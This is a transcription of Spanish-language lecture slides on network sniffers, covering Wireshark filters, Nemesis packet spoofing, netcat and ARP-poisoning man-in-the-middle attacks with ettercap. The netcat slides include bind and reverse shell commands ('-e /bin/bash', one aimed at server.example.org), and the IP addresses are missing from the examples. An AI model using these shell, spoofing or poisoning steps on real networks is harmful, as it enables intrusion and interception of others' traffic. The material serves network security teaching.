Sniffers. Dr. Roberto Gómez

Transcripción

1 Roberto Gómez Lámina 1 Los sniffers características y ejemplos Lámina 2 1

2 y Analizadores Un sniffer es un proceso que "olfatea" el tráfico que se genera en la red *a nivel de enlace*; puede leer toda la información que circule por el tramo de red en el que se encuentre. se pueden capturar claves de acceso, datos que se transmiten, numeros de secuencia, etc... Un analizador de protocolos es un sniffer al que se le ha añadido funcionalidad suficiente como para entender y traducir los protocolos que se están hablando en la red. debe tener suficiente funcionalidad como para entender las tramas de nivel de enlace, y los paquetes que transporten. Diferencia: normalmente la diferencia entre un sniffer y un analizador de protocolos, es que el segundo está a la venta en las tiendas y no muestra claves de acceso. Lámina 3 Cómo se comunican dos computadoras en una red local? snifeando (husmeando) computadora en modo promiscuo Lámina 4 2

3 Lista sniffers para Windows Ethereal wireshark WinDump Network Associates Sniffer (for Windows) WinNT Server (Network Monitor) BlackICE Pro CiAll EtherPeek Intellimax LanExplorer Triticom LANdecoder32 Lámina 5 Lista para Macintosh EtherPeek EtherPeek has been around for years in a Macintosh version and has also ported their software to Windows. Lámina 6 3

4 Lista sniffers para Unix esniff.c (phrack 45) tcpdump Linsniffer Linuxsniffer. Hunt Sniffit ethereal snoop snort trinux karpski SuperSniffer v1.3 exdump netxray Lámina 7 Lista sniffers DOS Sniffer(r) Network Analyzer The Gobbler and Beholder Klos PacketView Lámina 8 4

5 El sniffer ethereal, ahora wireshark Lámina 9 Ethereal Ethereal es un analizador de tráfico de red, o "sniffer", para sistemas operativos Unix y sistemas basados en Unix, así como sistemas Windows Utiliza: GTK+, una libreria que provee una interface de usuario grafica, libpcap,una libreria para filtrar y capturar paquetes, Posee la posibilidad de ver la reconstruccion del fluido de una sesión TCP. Autor: Gerald Combs (julio version ) Lámina 10 5

6 Características Datos pueden ser capturados del cable de una conexión viva, o leídos de un archivo capturado. Puede leer archivos de datos de diferentes paquetes de captura de datos tcpdump (libpcap), NAI's Sniffer (compressed and uncompressed), Sniffer Pro, NetXray, Sun snoop and atmsnoop, Shomiti/Finisar Surveyor, AIX's iptrace, Microsoft's Network Monitor, Novell's LANalyzer, RADCOM's WAN/LAN Analyzer, etc Lámina 11 Más características Datos pueden ser capturados de Ethernet, FDDI, PPP, Token-Ring, IEEE , Classical IP over ATM, e interfaces tipo loopback no todos los tipos son soportados en todas las plataformas Datos pueden verse a través de un GUI o de una terminal en texto plano. La salida puede ser guardada o impresa como texto plano o Postcript Toda, o parte, de la captura puede ser almcenada en disco. Lámina 12 6

7 En un principio era asi Lámina 13 La nueva vista menu principal main toolbar filter toolbar packet list pane tree view pane data view pane Lámina 14 7

8 La barra de status (statusbar) Lado izquierdo información acercar del archivo de captura nombre, tamaño y el tiempo transcurrido desde que empezó la captura El lado derecho muestra el numero de paquetes en el archivo de captura P: numero paquetes capturados D: numero de paquetes desplegados actualmente M: numero de paquetes marcados Lámina 15 Menu principal y capturando paquetes Lámina 16 8

9 Ventana para definir opciones captura Lámina 17 El panel: main tool bar encontrar un paquete encontrar el paquete siguiente encontrar el paquete previo zoom in los datos del paquete zoom out los datos del paquete establecer tamaño normal del paquete start/stop capture abrir archivos guardar como cerrar recargar el archivo de captura imprimir ir al paquete ir al primer paquete ir al último paquete filtros de capturas filtros de despliegue definir reglas desplegar paquetes editar (preferences) parámetros operación ethereal Lámina 18 9

10 Lámina 19 Viendo paquete en ventana separada Lámina 20 10

11 Opciones despliegue: menu view muestra-oculta barras herramientas muestra-oculta paneles Lámina 21 Ejercicio Lanza ethereal por 1 minuto no desplegar el tipo de tarjeta actualizar los paquetes en tiempo real Identifique 5 protocolos Tome un paquete y desplieguelo en otra ventana identifique tres campos de los encabezados Lámina 22 11

12 Filtrados de paquetes Dos tipos de filtros a nivel captura a nivel despliegue Lámina 23 Filtros para despliegue paquetes Lámina 24 12

13 Filtrando paquetes en la captura Ethereal utiliza lenguaje libpcap para definir sus filtros. mayor información man page de tcpdump Filtro se define en el campo filter de las preferencias del cuadro diálogo captura Un filtro esta formado por una serie de expresiones primitivas conectadas por conjunciones: Ejemplos [not] primitiva [and or [not] primitiva... ] tcp port 23 and host tcp port 23 and not host Lámina 25 Sintaxis filtrado de hosts Sintaxis host host src host host dst host host Descripcion host es una direccion IP o un nombre de host captura todos los paquetes cuando el host es el origen captura todos los paquetes cuando el host es el destino Ejemplos host src host dst host captura todos paquetes provenientes y dirigidos a captura todos los paquetes cuya direccion origen es captura todos los paquetes cuya direccion destino es Lámina 26 13

14 Sintaxis filtrado de puertos Sintaxis port puerto src port puerto dst port puerto Descripcion captura todos los paquetes donde el puerto es fuente o destino captura todos los paquetes donde puerto es el puerto origen captura todos los paquetes donde puerto es el puerto destino Ejemplos port 80 src port 80 dst port 80 captura todos paquetes donde 80 sea el puerto origen o destino captura todos los paquetes donde 80 es el puerto origen captura todos los paquetes donde 80 es el puerto destino Lámina 27 Sintaxis filtrado de redes Sintaxis net red src net red dst net red Descripcion captura todos los paquetes provenientes o dirigidos a la red captura todos los paquetes donde red es el origen captura todos los paquetes donde red es el destino Ejemplos net src net dst net captura todos paquetes donde la red es captura todos los paquetes donde la red origen es captura todos los paquetes donde la red destino es Lámina 28 14

15 Sintaxis filtrado basado en protocolos: ethernet Sintaxis ether proto \[nombre primitiva] Ejemplos ether proto \ip ether proto \arp ether proto \rarp captura todos paquetes ip captura todos los paquetes ARP captura todos los paquetes RARP Lámina 29 Sintaxis filtrado basado en protocolos: IP Sintaxis ip proto \[nombre protocolo] Ejemplos ip proto \tcp ip proto \udp ip proto \icmp captura todos paquetes TCP captura todos los paquetes UDP captura todos los paquetes ICMP Lámina 30 15

16 Combinando expresiones Operador! o not && o and o or Significado negación concatenación Ejemplos host &&!net host && port 80 captura todos paquetes provenientes o dirigidos al host que no vienen de la red captura todos paquetes provenientes o dirigidos al host con puerto origen o destino 80 Lámina 31 Dos ultimos ejemplos host &&! host captura todos los paquetes provenientes de y dirigidos a y no provenientes ni dirigidos de Ethereal no aceptará este filtro indicando que la expresión rechazará todos los paquetes host && not net captura todos los paquetes provenientes de y dirigidos a y no provenientes ni dirigidos de Etheral aceptará este filtro Recomendación: verificar los filtros! Lámina 32 16

17 Disección de paquetes Ethereal realiza una disección de los paquetes Los protocolos que entiende los disecta de tal forma que se puede apreciar el payload y el encabezado Encabezado TCP Payload: datos-aplicaciones Encabezado IP Payload: datos Eth. Det. Eth. Src. Prot. datos ( ) CRC Lámina 33 Buscando paquetes Display filter ip.addr== and tcp.flags.syn Hex Value "00:00" encontrar próximo paquete que contiene incluyen dos bytes null en la parte de datos String Lámina 34 17

18 Dos opciones interesantes Colorear paquetes colorear paquetes que cumple con reglas de un filtro opción: Colorize Display menú de Despliegue menú que surge cuando se selecciona un paquete Seguimiento de una sesión TCP permite reconstruir una sesión tcp opción: Follow TCP Streams menú campo del panel del árbol de tres vistas menú que surge cuando se selecciona un paquete Lámina 35 Pasos colorear paquetes Elegir opción Edit Coloring Rules, del main tool bar Se tiene que definir un filtro de despliegue y asociarle un color opción new de la ventana generada proporcionar un nombre al filtro después hay que definir el filtro Opciones definir filtro a través de un cuadro de diálogo (botón Expression) introducir expresión directamente Lámina 36 18

19 Pasos colorear paquetes Asociando un color a través de los cuadros de dialogo respectivo elegir colores foreground (caracteres) y del background (el fondo) Terminando opcion ok del cuadro Chose Color opción ok del cuadro Edit Color Filter Add Color Protocols Lámina 37 Siguiendo TCP streams Solo se puede dar seguimiento a protocolos orientados conexión Seleccionar paquete que forma parte de la sesión TCP a dar seguimiento. Seleccionar opción Follow TCP Stream del menú Lámina 38 19

20 Formatos despliegue disponibles ASCII datos de cada lado en ASCII, pero alternados caracteres no imprimibles no se despliegan EBCDIC for the big-iron freaks out there HEX Dump ver todos los datos, pero no se ve en ASCII Lámina 39 Resumen estadísticas (summary) File información general acerca archivo captura Time tiempo caputra primer y último paquete Capture información fecha y hora captura fue realizada Display información sobre los datos desplegados Traffic estadísticas sobre el tráfico visto si esta definido un filtro de despliegue, se verán valores en ambas colunes valores en columna Captures serán como antes valores en columna Displayed reflejaran valores vistos en el despliegue de información Lámina 40 20

21 Gráficas (IO Graphs) Graphs Graph 1-5 habilita la gráfica 1-5 (solo gráfica 1 esta habilitada por default) Color el color de la gráfica, (no puede ser cambiado) Filter: un filtro despliegue para esta gráfica (solo paquetes que pasen este filtro serán tomados en cuenta para esta gráfica) Style: el estilo de la gráfica (Line/Impulse/FBar) Eje X Tick interval el intervalo de las x (10/1/0.1/0.01/0.001 seconds) Pixels per tick usa 10/5/2/1 pixels por tick de intervalo Eje Y Unidades la unidad para el eje Y (Packets/Tick, Bytes/Tick, Advanced...) Escala la escala para el eje y (10,20,50,100,200,500,...) Lámina 41 Otras estadísticas Protocol Hierarchy Conversations End points Lámina 42 21

22 Ultimos comentarios Funciona para Windows 2000 necesario contar con WinPcap, se puede obtener de se puede bajar de: Se cuenta con una guía del usuario en html También corre en las siguientes plataformas: AIX, Tru64 UNIX (formerly Digital UNIX), Debian GNU/Linux, Slackware Linux, Red Hat Linux, FreeBSD, NetBSD, OpenBSD, HP/UX, Sparc/Solaris 8, Windows NT and Windows Me/98/95 Lámina 43 Es lento para la lectura Redes switcheadas Redes encriptadas Redes de alta velocidad Limitantes ethereal (y otros sniffers) Lámina 44 22

23 Nemesis Sofware de inyección de paquetes Lámina 45 Nemesis Software de inserción de paquetes, que soporta ARP, DNS, ICMP, IGMP, OSPF, RARP, RIP, TCP, UDP Desarrollado por Mark Grimes ) Ofrece características nuevas que no se pueden encontrar en ninguna otra herramienta de su clase. Inyección de paquetes puede ser controlada a nivel capa 2 o capa 3 (como el protocolo lo permita) Requisitos libnet: libpcap: Lámina 46 23

24 Nemesis Versión Unix nemesis-1.4beta3.tar.gz (Jun ) protocolos soportados: ARP, DNS, ETHERNET, ICMP, IGMP, IP, OSPF, RIP, TCP y UDP plataformas: *BSD(i), Linux, [Trusted] Solaris, Mac OS X requerimientos * libnet-1.0.2a Versión Windows nemesis-1.4beta3.zip (Jun ) protocolos soportados: ARP, DNS, ETHERNET, ICMP, IGMP, IP, OSPF, RIP, TCP y UDP plataformas: Windows 9x, Windows NT, Windows 2000, Windows XP requerimientos * libnetnt-1.0.2g (incluido en el archivo zip de Nemesis) * WinPcap-2.3 o * WinPcap-3.0 Lámina 47 Ejemplos nemesis nemesis tcp -v -S D fs -fa -y 22 -P toto envía paquete TCP (SYN/ACK) con payload del archivo ascii toto al puerto ssh, de a opción v permite visualizar el paquete inyectado nemesis udp -v -S D x y 53 -P bindpkt envia paquete UDP de :11111 al puerto de servicio de nombres de , con un payload que se lee del archivo bindpkt de nuevo: -v usado para confirmar paquete inyectado nemesis icmp -S D G i 5 enviar paquete ICMP REDIRECT de a con la dirección del gateway como dirección fuente Lámina 48 24

25 Protocolos soportados por Nemesis arp dns ethernet icmp igmp ip ospf rip tcp udp Sintaxis comando: nemesis <protocolo> [ opciones protocolo ] Lámina 49 Opciones protocolo arp (1) Sintaxis Opciones ARP/RARP Opción -S dir-ip -D dir-ip -h dir-hard -m dir-hard -P arch -r reply-enable -R rarp-enable -s Solaris-mode nemesis arp [-rstrvz?] [-d Ethernet-device ] [-D destination-ip-addr] [-h sender-hardware-addr ] [-H source-mac-addr ] [-m target-hardwareaddr ] [-M destination-mac-addr ] [-P payload-file ] [-S source IP addr ] Descripción Dirección IP fuente Dirección IP destino Dirección fuente (emisor) ethernet Dirección destinos ethernet Archivo de payload. Máximo 1472 bytes. También se puede especificar payload de línea comandos con opción -P Habilita respuestas ARP/RARP Habilita modo RARP Encabezado con información de acuerdo implementación Solaris Lámina 50 25

26 Opciones protocolo arp (2) Sintaxis nemesis arp [-rstrvz?] [-d Ethernet-device ] [-D destination-ip-addr] [-h sender-hardware-addr ] [-H source-mac-addr ] [-m target-hardwareaddr ] [-M destination-mac-addr ] [-P payload-file ] [-S source IP addr ] Opciones DATA LINK Opción -d Ethernet-device -H dir-hard-emis -M dir-hard-dest -Z network-inter Descripción Especifica nombre (Unix) o dirección (Windows) del dispositivo ehternet a utilizar Especifica la dirección fuente MAC (XX:XX:XX:XX:XX:XX) Especifica la dirección destino MAC (XX:XX:XX:XX:XX:XX) Lista las interfaces de red por número para usar en inyección a nivel enlace Lámina 51 Opciones protocolo tcp (1) Sintaxis Opciones TCP nemesis tcp [-vz?] [-a ack-number ] [-d Ethernet-device ] [-D destination-ipaddress ] [-f TCP-flags ] [-F fragmentation-options ] [-I IP-ID ] [-M destination- MAC-address ] [-o TCP-options-file ] [-O IP-options-file ] [-P payload-file ] [-s sequence-number ] [-S source-ip-address ] [-t IP-TOS ] [-T IP-TTL ] [-u urgentpointer ] [-w window-size ] [-x source-port ] [-y destination-port ] Opción -a ACK-NUM -f TCP flags -o arch-opts-tcp -P arch-carga -s seq-number -u urgent-ptr Descripción Número de acknowledgement dentro encabezado IP Bandeas TCP (-fs/-fa/-fr/-fp/-ff/-fu/-fe/-fc) Archivo opciones TCP (creado manualmente) Archivo payload. Máximo bytes. También se puede especificar payload de línea comandos con opción -P Número de secuencia dentro encabezado TCP Especifica el offset del urgent pointer dentro encabezado TCP Lámina 52 26

27 Opciones protocolo tcp (2) Sintaxis nemesis tcp [-vz?] [-a ack-number ] [-d Ethernet-device ] [-D destination-ipaddress ] [-f TCP-flags ] [-F fragmentation-options ] [-I IP-ID ] [-M destination- MAC-address ] [-o TCP-options-file ] [-O IP-options-file ] [-P payload-file ] [-s sequence-number ] [-S source-ip-address ] [-t IP-TOS ] [-T IP-TTL ] [-u urgentpointer ] [-w window-size ] [-x source-port ] [-y destination-port ] Opciones TCP Opción -v verbose -w window-size -x source-port -y dest-port Descripción Habilita modo verbose Especifica tamaño ventana dentro encabezado TCP Especifica el puerto fuente (emisor) dentro encabezado TCP Especifica el puerto destino dentro encabezado TCP Lámina 53 Opciones protocolo tcp (3) Sintaxis Opciones IP Opción -D dest-ip-addr -F frag-opts -I IP-ID -O arch-opts-tcp -S sour-ip-addr -t IP-TOS -T IP-TTL nemesis tcp [-vz?] [-a ack-num ] [-d Ethernet-device ] [-D destination-ip-addr] [-f TCP-flags ] [-F fragmentation-options ] [-I IP-ID ] [-M destination-mac-addr ] [-o TCP-options-file ] [-O IP-options-file ] [-P payload-file ] [-s sequence-number ] [- S source-ip-addr ] [-t IP-TOS ] [-T IP-TTL ] [-u urgent-pointer ] [-w window-size ] [-x source-port ] [-y destination-port ] Descripción Especifica dirección IP destino dentro encabezado IP Especifica opciones de fragmentación (-F[D],[M],[R],[offset]) en encabezado IP Especifica el identificador de IP dentro del encabezado IP Archivo opciones TCP (creado manualmente) Especifica dirección IP fuente dentro encabezado IP Especifica el tipo de servicio dentro encabezado IP (2, 4, 8, 24) Especifica el valor del tiempo de vida del paquete dentro del encabezado IP Lámina 54 27

28 Opciones protocolo tcp (4) Sintaxis nemesis tcp [-vz?] [-a ack-number ] [-d Ethernet-device ] [-D destination-ipaddress ] [-f TCP-flags ] [-F fragmentation-options ] [-I IP-ID ] [-M destination- MAC-address ] [-o TCP-options-file ] [-O IP-options-file ] [-P payload-file ] [-s sequence-number ] [-S source-ip-address ] [-t IP-TOS ] [-T IP-TTL ] [-u urgentpointer ] [-w window-size ] [-x source-port ] [-y destination-port ] Opciones DATA LINK Opción -d Ethernet-device -H dir-hard-emis -M dir-hard-dest -Z network-inter Descripción Especifica nombre (Unix) o dirección (Windows) del dispositivo ehternet a utilizar Especifica la dirección fuente MAC (XX:XX:XX:XX:XX:XX) Especifica la dirección destino MAC (XX:XX:XX:XX:XX:XX) Lista las interfaces de red por número para usar en inyección a nivel enlace Lámina 55 Opciones protocolo udp (1) Sintaxis Opciones UDP nemesis udp [-vz?] [-d Ethernet-device ] [-D destination-ip-address ] [-F fragmentation-options ] [-H source-mac-address ] [-I IP-ID ] [-M destination-mac-address ] [-O IP-options-file ] [-P payload-file ] [-S source-ip-address ] [-t IP-TOS ] [-T IP-TTL ] [-x source-port ] [-y destination-port ] Opción -P arch-carga -v verbose -x source-port -y dest-port Descripción Archivo payload. Máximo bytes. También se puede especificar payload de línea comandos con opción -P Habilita modo verbose Especifica el puerto fuente (emisor) dentro encabezado TCP Especifica el puerto destino dentro encabezado TCP Lámina 56 28

29 Opciones protocolo udp (2) Sintaxis Opciones IP nemesis udp [-vz?] [-d Ethernet-device ] [-D destination-ip-address ] [-F fragmentation-options ] [-H source-mac-address ] [-I IP-ID ] [-M destination-mac-address ] [-O IP-options-file ] [-P payload-file ] [-S source- IP-address ] [-t IP-TOS ] [-T IP-TTL ] [-x source-port ] [-y destination-port ] Opción -D dest-ip-addr -F frag-opts -I IP-ID -O arch-opts-tcp -S sour-ip-addr -t IP-TOS -T IP-TTL Descripción Especifica dirección IP destino dentro encabezado IP Especifica opciones de fragmentación (-F[D],[M],[R],[offset]) en encabezado IP Especifica el identificador de IP dentro del encabezado IP Archivo opciones TCP (creado manualmente) Especifica dirección IP fuente dentro encabezado IP Especifica el tipo de servicio dentro encabezado IP (2, 4, 8, 24) Especifica el valor del tiempo de vida del paquete dentro del encabezado IP Lámina 57 Opciones protocolo udp (3) Sintaxis nemesis udp [-vz?] [-d Ethernet-device ] [-D destination-ip-address ] [-F fragmentation-options ] [-H source-mac-address ] [-I IP-ID ] [-M destination-mac-address ] [-O IP-options-file ] [-P payload-file ] [-S source-ip-address ] [-t IP-TOS ] [-T IP-TTL ] [-x source-port ] [-y destination-port ] Opciones DATA LINK Opción -d Ethernet-device -H dir-hard-emis -M dir-hard-dest -Z network-inter Descripción Especifica nombre (Unix) o dirección (Windows) del dispositivo ehternet a utilizar Especifica la dirección fuente MAC (XX:XX:XX:XX:XX:XX) Especifica la dirección destino MAC (XX:XX:XX:XX:XX:XX) Lista las interfaces de red por número para usar en inyección a nivel enlace Lámina 58 29

30 Sintaxis inyección paquetes ICMP nemesis-icmp [-vz?] [-a ICMP-timestamp-request-reply-transmit-time ] [-b originaldestination-ip-address ] [-B original-source-ip-address ] [-c ICMP-code ] [-d Ethernet-device ] [-D destination-ip-address ] [-e ICMP-ID ] [-f original-ipfragmentation ] [-F fragmentation-options ] [-G preferred-gateway ] [-H source-macaddress ] [-i ICMP-type ] [-I IP-ID ] [-j original-ip-tos ] [-J original-ip-ttl ] [-l original- IP-options-file ] [-m ICMP-mask ] [-M destination-mac-address ] [-o ICMPtimestamp-request-transmit-time ] [-O IP-options-file ] [-p original-ip-protocol ] [-P payload-file ] [-q ICMP-injection-mode ] [-r ICMP-timestamp-request-reply-receivedtime ] [-S source-ip-address ] [-t IP-TOS ] [-T IP-TTL ] Lámina 59 Opciones ICMP paquetes ICMP Opción -c ICMP-code -e ICMP-ID -G gateway -i ICMP-type -m MAC-addr -P payload-file -T IP-TTL Descripción Especifica el código ICMP dentro del encabezado ICMP Especifica el identificador ICMP dentro encabezado ICMP Especifica la dirección IP del gateway para inyección redirección Especifica el tipo de ICMP dentro encabezado ICMP Especifica la dirección IP de la mascara dentro de los paquetes de mascara Especifica el tipo de servicio dentro encabezado IP (2, 4, 8, 24) Especifica el valor del tiempo de vida del paquete dentro del encabezado IP Lámina 60 30

31 Ejemplos nemesis nemesis tcp -v -S D fs -fa -y 22 -P toto envía paquete TCP (SYN/ACK) con payload del archivo ascii toto al puerto ssh, de a opción v permite visualizar el paquete inyectado nemesis udp -v -S D x y 53 -P bindpkt envia paquete UDP de :11111 al puerto de servicio de nombres de , con un payload que se lee del archivo bindpkt de nuevo: -v usado para confirmar paquete inyectado nemesis icmp -S D G i 5 enviar paquete ICMP REDIRECT de a con la dirección del gateway como dirección fuente Lámina 61 Ejercicio Nemesis Lanzar ethereal y empezar a capturar Teclear lo siguiente # echo Esto es un ejemplo de paquete TCP > toto # echo This is an example of UDP packet > cachafas # nemesis tcp -v -S D fsa -y 22 -P toto # nemesis udp -v -S D x y 53 -P cachafas # nemesis icmp -S D G qr # nemesis arp -v -d eth0 -H 0:1:2:3:4:5 -S D Detener ethereal y buscar los paquetes inyectados Lámina 62 31

32 Otros paquetes Inyectores Send IP sendip.html herramienta de comando línea que permite enviar paquetes IP arbitrarios winject: inyección de paquetes para Win9x & Win2k home19.inet.tele.dk/moofz/about_o.htm Engage Packet Builder /engagepacketbuilder/ Lámina 63 El sniffer etherape Monitor gráfico de red Modelado a partir de etherman Despliega actividad red en forma gráfica Hosts y links cambian su tamaño de acuerdo al tráfico presentado. Colores protocolos desplegados Posible filtrar tráfico # etherape & Lámina 64 32

33 Carácterísticas Multiplataforma Linux, Solaris, SGI, Alpha, FreeBSD, NetBSD, etc... Múltiples modos de funcionamiento: Capa física, IP, TCP Capturas en vivo o desde archivo Soporte de dispositivos Ethernet, FDDI, Token Ring, RDSI, PPP, SLIP Registro de parámetros estadísticos Lámina 65 Diagrama de bloques Lámina 66 33

34 Interfaz usuario Nodos Grupo Círculo Texto Enlace Leyenda Lámina 67 Información estadística Ventana de protocolos Información de protocolo Información de nodo Lámina 68 34

35 Netcat La navaja suiza de TCP/IP. Original (by Hobbit) BSD (Fedora 4) nc i386.rpm GNU netcat netcat i386.rpm Windows Llevado a Win95 y NT por Weld Pond de L0pht Lámina 69 Qué es netcat? Es una utilidad Unix que escribe datos a través de las conexiones de red, usando los protocolos TCP o UDP. El parámetro utilizado para las conexiones TCP es -t, aunque no es necesario, dado que esta es la opción por defecto. Para realizar conexiones UDP, puede utilizar el parámetro -u. Diseñada como una herramienta de backend, que puede ser usada directamente o por otros programas o scripts. Lámina 70 35

36 Principales opciones netcat Sintaxis: Algunas opciones: connect to somewhere: nc [-options] hostname port[s] [ports]... listen for inbound: nc -l -p port [-options] [hostname] [port] Opción l L n o p t v e cmd w Descripción deja a un puerto abierto en espera de una conexión lo mismo que l, pero sigue escuchando aún cuando la conexión es cerrada dirección numérica especifica; no hace un DNS Lookup obtiene un archivo log en Hex de la acción especificarle con esta opción el puerto a realizar una acción. se le especifica a netcat que debe realizar negociaciones telnet. modo verbose, mas información, se le puede añadir otra -v para mas información Ejecutar cmd cuando se conecta, p.e. /bin/bash para ejecutar un shell especificar un tiempo determinado para realizar conexiones. Lámina 71 Ejemplos de uso Copia de archivos Cliente (receptor) nc -l -p 2000 > archivo.recibido Servidor (emisor) nc hostremito 2000 < fichero Shell remoto estilo telnet Cliente nc hostremoto 2000 Servidor nc -l -p e /bin/bash Telnet inverso Cliente nc -l -p 2000 Servidor nc server.example.org e /bin/bash Streaming de audio Cliente nc server.example.org 2000 madplay Servidor c -l -p 2000 < fichero.mp3 Lámina 72 36

37 Escaneo de puertos C:\nc11nt>nc -v -v -z DNS fwd/rev mismatch: localhost!= NKRA localhost [ ] 53 (domain): connection refused localhost [ ] 25 (smtp): connection refused localhost [ ] 21 (ftp): connection refused sent 0, rcvd 0: NOTSOCK C:\nc11nt>nc -v -v -z DNS fwd/rev mismatch: localhost!= darkstar localhost [ ] 53 (domain): connection refused localhost [ ] 52 (?): connection refused localhost [ ] 51 (?): connection refused localhost [ ] 50 (?): connection refused localhost [ ] 49 (?): connection refused localhost [ ] 48 (?): connection refused etc Lámina 73 Conectando dos equipos con netcat Cliente Servidor nc nc l -p 5600 Corre como cliente, enviando cualquier entrada de la línea de comandos al puerto 5600 de la máquina Corre como servicio escuchando en el puerto 5600 Lámina 74 37

38 Y las redes switcheadas?? Introducción a los sniffers activos Lámina 75 Tipos de sniffers Pasivos sniffers no realizan actividad alguna solo capturan paquetes Activos sniffers intentan apoderarse de las sesiones uso de técnicas para lograr lo anterior spoofing envenenamiento de la tabla de arp Lámina 76 38

39 Spoofing Spoofing es la creación de paquetes de comunicación TCP/IP usando una dirección IP de alguien más. Lo anterior permite entrar en un sistema haciéndose pasar por un usuario autorizado. Una vez dentro del sistema, el atacante puede servirse de éste como plataforma para introducirse en otro y así sucesivamente. Ejemplo hacer un telnet al puerto 25 y enviar correos a nombre de otra persona Lámina 77 1er ejemplo spoofing: ataque ARP Consiste en hacerse pasar por una máquina que no es. Aprovecha el principio de funcionamiento del protocolo ARP. Sólo es útil es redes/máquinas que utilizan este protocolo (locales). También conocido como envenenamiento de ARP Lámina 78 39

40 Protocolo ARP (funcionamiento normal) Tabla arp de máquina A: L A : dirección lógica A, F A dirección física A se desconoce la dirección física de B (F B ) 1 L A F A L B? Máquina A pregunta la dirección física de B A X B Lámina 79 Protocolo ARP (funcionamiento normal) A actualiza su tabla arp 2 L A F A L B F B A X B B responde con su dirección física (F B ) Lámina 80 40

41 Ataque ARP (máquina A solicita direccón de B) Tabla arp de máquina A: 1 L A F A L B? Máquina A pregunta la dirección física de B A X B Máquina Intrusa Lámina 81 Ataque ARP A actualiza su tabla arp 2 L A F A L B F X Intruso responde con su dirección física (F B ) A X B Lámina 82 41

42 Ataque ARP Máquina intrusa (X) le notifica a B que ella es A B actualiza su tabla arp (cambia F A por F x ) 2 I A F A F X I B F B Tabla ARP de la máquina B X le envía a B su dirección física (F x ) A X B Máquina Intrusa Lámina 83 Finalmente A B De B para A De B para A De A para B X De A para B Máquina Intrusa Toda la información entre A y B pasa por X Lámina 84 42

43 Presentando ettercap Kiddie: A friend of mine told me that it is possible to sniff on a LAN... so I bought a switch ;) NaGoR: mmhhh... Kiddie: Now my LAN is SECURE! you can't sniff my packets... ah ah ah NaGoR: are you sure? look at ettercap doing its work... Kiddie: Oh my god... it sniffs all my traffic!! I will use only ciphered connections on my LAN, so ettercap can't sniff them! ah ah ah NaGoR: mmhhh... Kiddie: Now I'm using SSH. My LAN is SECURE! NaGoR: are you sure? look at ettercap doing its work... Kiddie: shit!! grrrr... "a false sense of security, is worse than insecurity" -- Steve Gibson hey folks... wake up! the net is NOT secure!! ettercap demonstrates that now is the time to encourage research on internet protocols to make them more secure. Lámina 85 Modos operación El sniffer tiene cuatro modos de operación Basado en IP, paquetes filtrados en fuente y destino IP Basado en MAC, paquetes filtrados en base a direcciones MAC, útil para sniffear conexiones a través del gateway Basado en ARP, útil para envenenar el arp para sniffear en una lan switcheado entre dos hosts (full-duplex) Basado en ARP público, usa envenamiento de arp para sniffear una lan switcheada de un host víctima al resto de los hosts (half-duplex) Lámina 86 43

44 Arp based sniffing No pone la interfaz en modo promiscuo. No es necesario, los paquetes llegan a la máquina. el switch reenvia los paquetes a la máquina Como funciona ettecarp envenena el caché del arp de dos hosts, identificandose como otro host una vez que el caché fue envenenado, los hosts empiezan a comunicarse, pero sus paquetes se envían a la máquina interceptora esta máquina almacena estos paquetes y los enviara a la máquina destino Lámina 87 Características arp sniffing La conexión es transparente para las víctimas no saben que están siendo snifeados la única forma de descubrir lo que esta pasando es ver los cachés arp de las máquinas y verificar si hay dos hosts con la misma dirección MAC host 1 (envenenado) host 2 (envenenado) host atacante ( ettercap ) Lámina 88 44

45 Envenenando el caché de arp Protocolo arp tiene una inseguridad intrínseca. Para reducir tráfico en cable, creará una entrada en la caché del arp, aún cuando no fue solicitado. Cada arp-reply que viaja en el cable será insertado en la tabla de arp. Ataque: se enván arp-reply a los dos host a sniffear en este mensaje se indica que la dirección mac del segundo host es la del atacante el host enviara paquetes que deben ir al primer host a la máquina atacante lo mismo para el primer host pero en orden inverso Lámina 89 Ejemplos host envenenados HOST 1: ATTACKER HOST: mac: 01:01:01:01:01:01 mac: 03:03:03:03:03:03 ip: ip: HOST 2: mac: 02:02:02:02:02:02 ip: se envían mensajes arp-reply a: HOST 1 indicando que esta en: 03:03:03:03:03:03 HOST 2 indicando que esta en: 03:03:03:03:03:03 ahora se encuentran envenenados, y enviaran paquetes al host de ataque, este último enviará paquetes de la siguiente forma: HOST 1 será reenviado a: 02:02:02:02:02:02 HOST 2 será reenviado a: 01:01:01:01:01:01 Lámina 90 45

46 Requerimientos No requiere de ninguna biblioteca como libpcap, libnet o libnids, tampoco es necesario ncurses, pero es altamente recomendable instalarlo. Si es necesario que soporte SSH1 y/p HTTPS, ettercap requiere las bibliotecas de OpenSSL Para Win32: requiere Windows NT/2000/XP. winpcap versión 2.3 o mayor cygwin de Lámina 91 La interfaz ncurses Ventana principal dividida en tres subsecciones: alta: diagrama de conexión, que despliega las dos máquinas a sniffear o a conectar o sobre las que se va a operar media: lista de los host conocidos en la LAN (unidos hub o switch) baja: ventana de status, proporciona información adicional acerca de los objetos actualmente seleccionados, status actual y otros hints importantes. Lámina 92 46

47 Cómo funciona todo? Lanzando ettercap La lista de hosts Sniffing basado en IP Sniffing basado en MAC Sniffing basado en ARP Envenamiento de ARP ARP público ARP público inteligente Inyección de caracteres Lámina 93 Lanzando ettercap Comando ettercap Lámina 94 47

48 Lista hosts disponibles Lo primero que se obtiene es la lista de hosts de la LAN Se puede seleccionar con flechas y teclas de tabulador los dos hosts a monitorear, y después seleccionar el método apropiado (IP, MAC or ARP based sniffing). Lámina 95 La lista de hosts Cuando empieza hace una lista de todos los hosts en la LAN. Envía un ARP REQUEST a cada IP en la LAN revisando la IP actual y el netmask posible capturar los ARP REPLIES y hacer la lista de los hosts que están respondiendo en la LAN Con este método también los hosts Windows responden Precaución con netmask = ettercap enviará 255*255 = mensajes tipo arp request tomará más de un minuto construir la lista Lámina 96 48

49 Ejemplo lista de hosts Lámina 97 Elegir en medio de quien se quiere poner Seleccionar la primera computadora de la columna a la izquierda Seleccionar la segunda de la columna derecha Para moverse entre las máquinas utilizar la flecha arriba y abajo Para moverse entre columnas utilizar la tecla con la flecha derecha o izquierda Las máquinas seleccionadas se despliegan el parte superior Se despliega su dirección MAC e IP Se elige la primera IP Lámina 98 49

50 Ejemplo direcciones seleccionadas Se elige la segunda IP Lámina 99 Seleccionando que hacer Presionando F1 se accede al menú de ayuda todos los menú poseen su propia ayuda, se accede pulsando F1 Hay 3 modos de sniffing: Envenenamiento ARP -> pulsando 'a' o 'A Sniffing a las IPs -> pulsando 's' o 'S Sniffing a las MAC -> pulsando 'm' o 'M' Lámina

